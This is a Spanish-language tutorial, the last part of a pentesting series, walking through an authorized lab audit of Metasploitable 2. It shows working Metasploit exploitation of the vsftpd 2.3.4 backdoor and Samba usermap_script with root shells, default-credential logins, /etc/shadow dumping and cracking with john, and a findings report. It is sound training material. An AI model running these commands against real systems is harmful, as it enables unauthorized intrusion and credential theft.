El Camino del Hacker: Serie de 5 Partes
Parte 1: Introducción → Parte 2: Dominio del Flipper → Parte 3: Fundamentos de Kali → Parte 4: Explotación → Parte 5: La Auditoría Completa
Empezaste esta serie preguntándote qué hacen realmente los hackers. Aprendiste que no se trata de capuchas y texto verde. Es resolución metódica de problemas. Has clonado credenciales, mapeado redes, capturado handshakes y obtenido shells en máquinas vulnerables.
Ahora lo unimos todo. Este artículo te guía a través de una prueba de penetración completa contra un objetivo ficticio. Cada fase, cada decisión, cada hallazgo, documentado exactamente como lo haría un profesional.
El Escenario
Cliente: Initech Labs (una pequeña empresa tecnológica ficticia)
Alcance: Prueba de penetración de red interna
Objetivo: Identificar vulnerabilidades y demostrar el impacto potencial en el negocio
Tu objetivo: Tu propia red de laboratorio (Kali + Metasploitable 2 + cualquier otra VM que hayas configurado)
Prepárate un café. Esto va a ser divertido.
Fase 1: Pre-Compromiso
Antes de tocar un teclado, los pentesters profesionales se ocupan del lado comercial. Si te saltas esto, no eres un pentester. Eres simplemente alguien cometiendo delitos.
La Llamada de Alcance
En un compromiso real, tendrías una llamada con el cliente para entender:
- ¿Qué está dentro del alcance? ¿Qué redes, rangos de IP, aplicaciones?
- ¿Qué está fuera del alcance? ¿Sistemas de producción? ¿Servicios de terceros?
- ¿Ventana de pruebas? ¿Cuándo puedes probar? ¿Solo en horario laboral?
- ¿Puntos de contacto? ¿A quién llamas si algo se rompe?
- ¿Objetivos? ¿Cumplimiento normativo o mejora real de seguridad?
Para Tu Laboratorio
Alcance: Solo tu red de laboratorio aislada. Fuera de alcance: Todo lo demás en el planeta. Ventana de pruebas: Cuando quieras. Objetivo: Aprender haciendo.
Reglas de Compromiso
Los compromisos reales tienen reglas escritas. Esto es lo que típicamente cubren:
- Carta de autorización - Documento firmado que demuestra que tienes permiso
- Procedimientos de escalación - Qué hacer si encuentras algo crítico
- Manejo de datos - Cómo manejar datos sensibles que encuentres
- Requisitos de limpieza - Eliminar todas las herramientas y puertas traseras al terminar
- Plazo del informe - ¿Cuándo se entrega el informe final?
Siempre Obtén Permiso por Escrito
Incluso para pruebas "amigables" en la red de un amigo. Un correo firmado diciendo "tienes permiso para probar mi red desde FECHA hasta FECHA" podría ser la diferencia entre una experiencia de aprendizaje y una condena por delito grave. Tómate esto en serio.
Fase 2: Reconocimiento
Es hora de aprender todo sobre el objetivo. En un compromiso real, esto incluiría OSINT (inteligencia de fuentes abiertas): búsquedas en Google, perfiles de LinkedIn, sitios web de la empresa, registros DNS. Para nuestro laboratorio, pasamos directamente al reconocimiento activo.
Paso 1: Descubrimiento de Red
Primera pregunta: ¿Qué hay en esta red?
bash# Encuentra tu rango de red
ip a | grep inet
# Busca algo como: inet 192.168.56.100/24
# Descubre todos los hosts activos
sudo nmap -sn 192.168.56.0/24 -oA discovery
# Resultados (ejemplo):
Nmap scan report for 192.168.56.1
Host is up (0.00032s latency).
Nmap scan report for 192.168.56.101
Host is up (0.00089s latency).
Nmap scan report for 192.168.56.102
Host is up (0.00045s latency).Documenta todo. Crea una nota así:
text# Initech Labs - Descubrimiento de Red
# Fecha: 2026-03-08
# Tester: Tu Nombre
192.168.56.1 - Gateway/Router
192.168.56.101 - Desconocido (por investigar)
192.168.56.102 - Desconocido (por investigar)Paso 2: Escaneo de Puertos
Ahora profundizamos. ¿Qué servicios están corriendo?
bash# Escaneo completo de puertos con detección de servicios
sudo nmap -sV -sC -p- -oA full_scan 192.168.56.101
# Esto tarda un rato. Para resultados más rápidos durante el aprendizaje:
sudo nmap -sV -sC --top-ports 1000 -oA quick_scan 192.168.56.101En Metasploitable 2, verás un tesoro:
textPORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.8
139/tcp open netbios-ssn Samba smbd 3.X
445/tcp open netbios-ssn Samba smbd 3.X
3306/tcp open mysql MySQL 5.0.51a
5432/tcp open postgresql PostgreSQL DB
...Vaya exposición. Actualicemos nuestras notas:
text192.168.56.101 - Servidor Linux (Metasploitable)
- FTP (21): vsftpd 2.3.4 # ¡Backdoor conocido!
- SSH (22): OpenSSH 4.7p1 # Antiguo
- Telnet (23): Activo # ¿Por qué existe esto en 2026?
- HTTP (80): Apache 2.2.8 # Apps web para probar
- SMB (139/445): Samba 3.X # Mina de oro potencial
- MySQL (3306): 5.0.51a # ¿Acceso a base de datos?
- PostgreSQL (5432): Activo # Otra BDPaso 3: Identificación de Vulnerabilidades
Es hora de ver qué es realmente explotable.
bash# Ejecutar scripts de vulnerabilidades
sudo nmap --script vuln -oA vuln_scan 192.168.56.101
# Verificar servicios específicos en Metasploit
msfconsole
msf6 > search vsftpd
msf6 > search samba 3
msf6 > search apache 2.2El backdoor de vsftpd 2.3.4 salta inmediatamente a la vista. Eso es un shell garantizado. Pero un buen pentester no se detiene en el primer hallazgo. Documentas todo.
Fase 3: Explotación
Aquí es donde las cosas se ponen emocionantes. Tenemos múltiples puntos de entrada potenciales. Trabajemos sistemáticamente con cada uno.
Vector de Ataque 1: Backdoor FTP
bashmsf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned
[+] Command shell session 1 opened
whoami
root
id
uid=0(root) gid=0(root)Hallazgo documentado: Shell de root obtenido mediante backdoor FTP. Tiempo desde el primer escaneo hasta el compromiso total: aproximadamente 10 minutos.
Pero no nos detenemos aquí. ¿A qué más podemos acceder?
Vector de Ataque 2: Samba
bash# Poner en segundo plano la sesión actual
background
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit
[*] Command shell session 2 opened
whoami
rootOtro shell de root a través de un vector diferente. Son dos caminos independientes hacia el compromiso total.
Vector de Ataque 3: Aplicaciones Web
Veamos qué está corriendo en el puerto 80.
bash# Enumerar directorios web
gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt
# Resultados:
/cgi-bin/ (Status: 403)
/dav/ (Status: 301)
/icons/ (Status: 301)
/index (Status: 200)
/phpMyAdmin/ (Status: 301)
/phpinfo (Status: 200)
/test/ (Status: 301)
/twiki/ (Status: 301)
# Ejecutar nikto para más hallazgos
nikto -h http://192.168.56.101¿phpMyAdmin con credenciales por defecto? Comprobemos:
text# Probar credenciales comunes
Username: root
Password: (vacío)
# ¡Acceso concedido!Acceso de administrador a la base de datos sin contraseña. Desde aquí, podríamos volcar todos los datos, modificar registros o usar las operaciones de archivos de MySQL para escribir un web shell.
Vector de Ataque 4: Credenciales SSH Débiles
bashmsf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.56.101
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run
[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'Las credenciales débiles otorgan acceso SSH. No es root, pero nos encargaremos de eso en la post-explotación.
Fase 4: Post-Explotación
Tenemos acceso. ¿Y ahora qué? Una prueba de penetración real demuestra el impacto en el negocio. ¿Qué puede hacer realmente un atacante con este acceso?
Recolección de Credenciales
bash# Desde nuestro shell de root
cat /etc/shadow
root:$1$xyz...truncated...:14889:0:99999:7:::
msfadmin:$1$abc...truncated...:14889:0:99999:7:::
user:$1$def...truncated...:14889:0:99999:7:::
postgres:$1$ghi...truncated...:14889:0:99999:7:::
# Guardar estos para cracking offline
cat /etc/passwd > /tmp/passwd.txt
cat /etc/shadow > /tmp/shadow.txt
# En Kali, crackearlos
unshadow passwd.txt shadow.txt > combined.txt
john --wordlist=/usr/share/wordlists/rockyou.txt combined.txtReconocimiento de Red (Desde Dentro)
bash# ¿A qué otras redes puede llegar esta máquina?
ifconfig
route -n
cat /etc/hosts
arp -a
# ¿Qué se está conectando a esta máquina?
netstat -tulpn
ss -tulpn
# Buscar claves SSH (para movimiento lateral)
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/nullDescubrimiento de Datos Sensibles
bash# Buscar archivos interesantes
find / -name "*.conf" 2>/dev/null | head -20
find / -name "*.sql" 2>/dev/null
find / -name "*.bak" 2>/dev/null
find / -name "*password*" 2>/dev/null
# Verificar ubicaciones comunes de configuración
cat /var/www/*/config.php 2>/dev/null
cat /etc/mysql/my.cnf
# Enumeración de base de datos
mysql -u root -p # Probar contraseña vacía
mysql> SHOW DATABASES;
mysql> SELECT * FROM mysql.user;Escalación de Privilegios (desde msfadmin)
¿Recuerdas ese login SSH como msfadmin? Escalemos a root usando lo que aprendimos en la Parte 4.
bash# SSH como msfadmin
ssh [email protected]
# Verificar permisos sudo
sudo -l
# (La salida varía, pero verifiquemos otros vectores)
# Encontrar binarios SUID
find / -perm -4000 2>/dev/null
# Buscar scripts escribibles ejecutados por root
cat /etc/crontab
# Subir y ejecutar LinPEAS para verificación completa
# (En escenario real, ya cubierto en la Parte 4)Fase 5: Documentación y Hallazgos
La prueba es inútil sin un informe. Esto es lo que separa a los profesionales de los script kiddies. Necesitas explicar qué encontraste, por qué importa y cómo solucionarlo.
Resumen de Hallazgos
Esto es lo que encontramos en la red de "Initech Labs", formateado como aparecería en un informe real:
CRÍTICO: Backdoor en Servicio FTP (CVE-2011-2523)
Sistema Afectado: 192.168.56.101
Riesgo: Ejecución remota de código sin autenticación como root
Evidencia: Shell de root completo obtenido en menos de 60 segundos
Recomendación: Actualizar inmediatamente vsftpd a la versión actual o deshabilitar el servicio FTP por completo.
CRÍTICO: Ejecución Remota de Código en Samba
Sistema Afectado: 192.168.56.101
Riesgo: Ejecución remota de código sin autenticación como root
Evidencia: Shell de root completo obtenido mediante el exploit usermap_script
Recomendación: Actualizar Samba a la versión actual. Restringir el acceso SMB solo a los sistemas necesarios.
ALTO: Acceso Root a MySQL Sin Contraseña
Sistema Afectado: 192.168.56.101
Riesgo: Compromiso completo de la base de datos, robo de datos, despliegue de web shell
Evidencia: Inicio de sesión como root con contraseña vacía a través de phpMyAdmin
Recomendación: Establecer contraseña fuerte para root. Restringir acceso a phpMyAdmin. Considerar eliminar phpMyAdmin por completo.
ALTO: Credenciales SSH Débiles
Sistema Afectado: 192.168.56.101
Riesgo: Acceso autenticado que lleva a escalación de privilegios
Evidencia: msfadmin:msfadmin autenticado exitosamente
Recomendación: Implementar política de contraseñas fuertes. Implementar autenticación SSH basada en claves. Considerar fail2ban.
MEDIO: Servicio Telnet Habilitado
Sistema Afectado: 192.168.56.101
Riesgo: Credenciales transmitidas en texto plano
Evidencia: Puerto 23 abierto y aceptando conexiones
Recomendación: Deshabilitar Telnet. Usar SSH para toda administración remota.
BAJO: Página phpinfo() Expuesta
Sistema Afectado: 192.168.56.101
Riesgo: La divulgación de información facilita ataques posteriores
Evidencia: http://192.168.56.101/phpinfo accesible sin autenticación
Recomendación: Eliminar o restringir acceso a páginas phpinfo.
Resumen Ejecutivo
Esto es lo que los ejecutivos realmente leen. Mantenlo corto, impactante y sin jerga:
Resumen Ejecutivo
Durante la prueba de penetración de la red interna de Initech Labs, el equipo de seguridad logró control administrativo completo del servidor principal en 10 minutos desde el inicio de la evaluación.
Hallazgos Clave:
- 2 vulnerabilidades críticas que permiten toma de control remota inmediata
- 2 problemas de alta severidad que exponen bases de datos y credenciales de usuario
- Múltiples hallazgos medios y bajos que indican brechas de seguridad sistémicas
Conclusión: Un atacante con habilidades básicas podría comprometer completamente este sistema en minutos. Se requiere remediación inmediata para todos los hallazgos críticos y altos. Se recomienda una evaluación de seguimiento después de aplicar las correcciones.
Fase 6: Limpieza y Cierre
Un pentester profesional deja el entorno exactamente como lo encontró.
bash# Documentar todas las sesiones
msf6 > sessions -l
# Cerrar todas las sesiones
msf6 > sessions -K
# En el objetivo (si creaste archivos):
rm /tmp/linpeas.sh
rm /tmp/*.txt
# Eliminar usuarios que hayas creado
userdel testuser
# Eliminar claves SSH que hayas añadido
rm /home/*/.ssh/authorized_keys
# Documentar todo lo que eliminasteEn un compromiso real, también:
- Eliminar todas las herramientas subidas durante las pruebas
- Documentar cualquier cambio realizado en el entorno
- Proporcionar hashes/checksums de datos extraídos
- Eliminar de forma segura todos los datos del cliente tras entregar el informe
La Lista de Verificación Metodológica Completa
Tu flujo de trabajo reutilizable para cualquier prueba de penetración:
Metodología de Pruebas de Penetración
- Pre-Compromiso
- Definir alcance y reglas de compromiso
- Obtener autorización por escrito
- Establecer canales de comunicación
- Configurar tu entorno de pruebas
- Reconocimiento
- Descubrimiento de red (enumeración de hosts)
- Escaneo de puertos e identificación de servicios
- Escaneo de vulnerabilidades
- Enumeración de aplicaciones web
- Documentar todo
- Explotación
- Validar vulnerabilidades (no confíes ciegamente en escáneres)
- Explotar vulnerabilidades confirmadas
- Documentar cada compromiso exitoso
- Capturar evidencia (capturas de pantalla, logs)
- Post-Explotación
- Enumerar el sistema comprometido
- Recolectar credenciales
- Identificar datos sensibles
- Intentar escalación de privilegios
- Buscar oportunidades de movimiento lateral
- Informe
- Escribir resumen ejecutivo (impacto en el negocio)
- Documentar todos los hallazgos con evidencia
- Proporcionar recomendaciones de remediación
- Incluir detalles técnicos para equipos de TI
- Limpieza
- Eliminar todas las herramientas y artefactos
- Cerrar todas las sesiones y puertas traseras
- Documentar cualquier cambio en el entorno
- Manejar de forma segura los datos del cliente
Lo Que Sigue: Tu Camino Hacia Adelante
Has completado El Camino del Hacker. Has pasado de "¿qué significa hackear?" a realizar una prueba de penetración completa. Eso es genuinamente impresionante.
Pero esto es solo el comienzo. Aquí es donde ir desde aquí:
Plataformas de Práctica
- Hack The Box - Máquinas realistas para practicar. Empieza con cajas retiradas "Fáciles".
- TryHackMe - Rutas de aprendizaje guiadas. Excelente para progresión estructurada.
- VulnHub - VMs vulnerables gratuitas para descargar y practicar localmente.
- PentesterLab - Enfoque en seguridad de aplicaciones web.
Certificaciones (Si Las Quieres)
- eJPT (eLearnSecurity Junior Penetration Tester) - Excelente punto de partida, examen práctico
- OSCP (Offensive Security Certified Professional) - El estándar de la industria, brutal pero respetado
- PNPT (Practical Network Penetration Tester) - Moderno, práctico, incluye redacción de informes
- CEH (Certified Ethical Hacker) - Para requisitos corporativos, menos práctico
Especializaciones
- Seguridad de Aplicaciones Web - OWASP, Burp Suite, inyección SQL, XSS
- Active Directory - La mayoría de entornos corporativos lo usan
- Seguridad en la Nube - Pentesting en AWS, Azure, GCP
- Seguridad Móvil - Pruebas de aplicaciones Android/iOS
- Red Teaming - Simulación completa de adversario, física + digital
- Ingeniería Inversa - Análisis de malware, desarrollo de exploits
Construye Tu Laboratorio Doméstico
Los mejores pentesters tienen laboratorios elaborados. Empieza simple y expande:
- Añade Windows Server con Active Directory
- Configura un controlador de dominio
- Despliega aplicaciones web vulnerables (DVWA, bWAPP, WebGoat)
- Construye una red con múltiples segmentos
- Añade HoneyAegis para ver ataques desde la perspectiva del defensor
El Camino del Hacker: Completo
Lo lograste. Las cinco partes, de curioso a capaz.
Parte 1: Introducción Parte 2: Dominio del Flipper Parte 3: Fundamentos de Kali Parte 4: Explotación Parte 5: La Auditoría Completa
Serie Completa - Tu Recorrido
Parte 1: Aprendiste qué es realmente el hacking y obtuviste tus primeras victorias con el Flipper Zero
Parte 2: Dominaste cada protocolo del Flipper: Sub-GHz, RFID, NFC, BadUSB, GPIO
Parte 3: Construiste tu laboratorio Kali, aprendiste nmap y capturaste handshakes WiFi
Parte 4: Dominaste Metasploit, explotación, escalación de privilegios y pivoting
Parte 5: Uniste todo en una metodología completa de pruebas de penetración
La seguridad no es un destino. Es una práctica. Las herramientas cambiarán, las vulnerabilidades evolucionarán, pero la metodología permanece igual. Cuestiona todo. Documenta todo. Nunca dejes de aprender.
Bienvenido al otro lado.
- Lee